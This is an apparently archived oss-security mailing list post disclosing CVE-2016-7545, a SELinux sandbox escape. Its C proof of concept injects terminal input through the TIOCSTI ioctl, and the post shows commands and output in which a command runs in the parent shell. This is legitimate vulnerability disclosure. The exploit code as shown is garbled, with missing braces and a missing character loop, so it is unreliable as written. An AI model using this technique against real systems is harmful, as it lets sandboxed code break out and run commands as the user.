Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 25 Sep 2016 13:49:11 +0200
Subject: CVE-2016-7545 -- SELinux sandbox escape


When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
     char *cmd = "id\n";
      ioctl(0, TIOCSTI, cmd++);
     execlp("/bin/id", "id", NULL);

$ gcc test.c -o test
$ /bin/sandbox ./test
uid=1000 gid=1000 groups=1000
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

Bug report:

Upstream fix:

Federico Bento.

This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.